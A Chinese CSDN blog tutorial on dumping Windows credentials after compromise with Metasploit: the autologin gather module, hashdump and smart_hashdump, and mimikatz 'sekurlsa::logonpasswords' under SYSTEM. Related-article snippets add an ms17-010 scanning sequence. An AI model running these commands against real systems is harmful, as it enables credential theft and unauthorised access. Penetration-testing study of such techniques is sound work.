MSF中获取用户密码

最新推荐文章于 2024-06-15 20:20:53 发布
最新推荐文章于 2024-06-15 20:20:53 发布
阅读量1.6k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53087192/article/details/112707340
版权

获取用户密码的方法

抓取自动登录的密码

导出密码哈希

上传mimikatz程序

加载kiwi模块

抓取自动登录的密码

很多用户习惯将计算机设置自动登录,可以使用

run windows/gather/credentials/windows_autologin

抓取自动登录的用户名和密码

导出密码哈希

hashdump 模块可以从SAM数据库中导出本地用户账号,执行:

run hashdump

该命令的使用需要系统权限

用户哈希数据的输出格式为:

用户名:SID:LM哈希:NTLM哈希:::

还可以使用命令:

run windows/gather/smart_hashdump

该命令的使用需要系统权限。该功能更强大,如果当前用户是域管理员用户,则可以导出域内所有用户的hash

上传mimikatz程序

我们还可以通过上传mimikatz程序,然后执行mimikatz程序来获取明文密码
执行mimikatz必须System权限。

我们先getsystem提权至系统权限,然后执行 execute -i -f mimikatz.exe ,进入mimikatz的交互界面。然后执行:

privilege::debug
sekurlsa::logonpasswords

加载kiwi模块

该模块的使用需要System权限。关于该模块的用法:

https://blog.csdn.net/m0_53087192/article/details/112707016

amd6700k
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf后渗透之获取登入password、远程控制、调用摄像头
m0_61506558的博客
09-02 2397
在terminal输入load kili creds_all直接获取密码(不一定成功) 使用kiwi_cmd sekurlsa::logonpasswords获取密码
MSF抓取密码
qq_42383069的博客
03-24 1872
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
MSF后渗透之获取windows登录密码
qq_55364369的博客
09-05 2760
MSF后渗透之获取windows登录密码
cs与msf权限传递,以及mimikatz抓取明文密码
最新发布
M372109150的博客
06-15 1229
cs与msf权限传递,以及mimikatz抓取win10明文密码
msf渗透实验,抓取密钥及密钥生成原理所引发的问题
qq_64951792的博客
04-26 952
msf渗透实验
mimikatz获取系统管理员账号明文密码工具
02-15
mimikatz 是一个来自法国的神器,能直接读取系统管理员密码明文,通杀xp win2003 win7 win2008,这个工具功能很强大,如果您能熟练运用它,就能体会到。
获取目标Windows密码方式总结
Kevin's Blog
11-10 1299
文章目录一、目的/需求二、MSF的mimikatz模块获取密码2.1 模块介绍2.2 前提条件2.3 操作方法2.3.1 权限提升(略)2.3.2 进程迁移2.3.3 获取哈希2.2.4 获取密码三、MSF的kiwi模块获取密码3.1 模块介绍3.2 操作方法3.2.1 获取密码 一、目的/需求   拿到victim的控制权限,需要远程登录victim的主机,这时需要获取对方的登录密码。 二、MSF的mimikatz模块获取密码 2.1 模块介绍 1. 介绍:   Mimikatz由法国人开发的轻量级调试工
kali+msf永恒之蓝渗透win7并建立新用户获取权限
潜水中
03-04 3400
kali+msf永恒之蓝渗透win7并建立新用户获取权限 1. 准备一台关闭防火墙的win7,目标ip地址为192.168.128.147,本机ip为192.168.128.146 2. 保证msf执行run的时候win7是开启的 msfconsle #启动msf search name:ms17-010 type:auxiliary use auxiliary/scanner/smb/smb_ms17_010 show options set rhosts 192.168.128.147
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6976
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库导出本地用户账号,该命令的使用需要系统权限
metasploit获取系统密码hash值
天元喜羊羊的博客
04-27 6047
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c... [*] Obtaining the user list and keys... [*] Decrypting user keys
msf使用mimikatz加载用户明文密码
qq_36992014的博客
05-08 866
meterpreter > load mimikatz meterpreter > creds_kerberos 可以获得明文密码 mimikatz 之后改名为kiwi 使用 meterpreter > help kiwi 帮助信息,以后探索
神器 mimikatz - 直接抓取 Windows 明文密码
oceanark的博客
07-13 7476
昨天有朋友发了个法国佬写的神器叫 mimikatz让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clear
Metasploit(msf)系列-利用浏览器漏洞渗透提权
chaojixiaojingang
09-20 4717
         我最近在学习Kali系统msf框架的使用,怎样利用浏览器漏洞渗透提权,现在我就把学习到的一点小成果展示出来。在此之前我要先介绍本次利用的漏洞是ms10_018,想具体了解该漏洞可以参考:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-018 Metasploit概述: ...
Metasploit使用Mimikatz抓取内存的Windows密码
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-24 1632
我是通过这个漏洞学习内存抓取Windows密码的 首先你需要提升Shell权限为System 加载mimikatz模块 load mimikatz 三种获取密码方法 一、可以抓取到当前所有登录用户的明文密码(推荐使用) kerberos 二、只可显示HASH(显示所有用户密码HASH) mimikatz_command -f samdump::hashes 三、只能显示当前登录的用户加密后的密码 ...
cs与msf权限传递,以及mimikatz抓取win2012明文密码
weixin_63750160的博客
05-28 236
一、mimikatz抓取windows明文密码我这里用的是window2016测试假设我已经获取到了一台windows的权限抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
MSF getshell
09-10
MSF有两个版本,分别是开源免费的Metasploit和商业收费的Metasploit Pro,针对一般用户来说,使用免费的社区版就足够了。 使用MSF有以下几个步骤: 1. 下载和安装MSF,可以通过以下链接获取下载地址:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值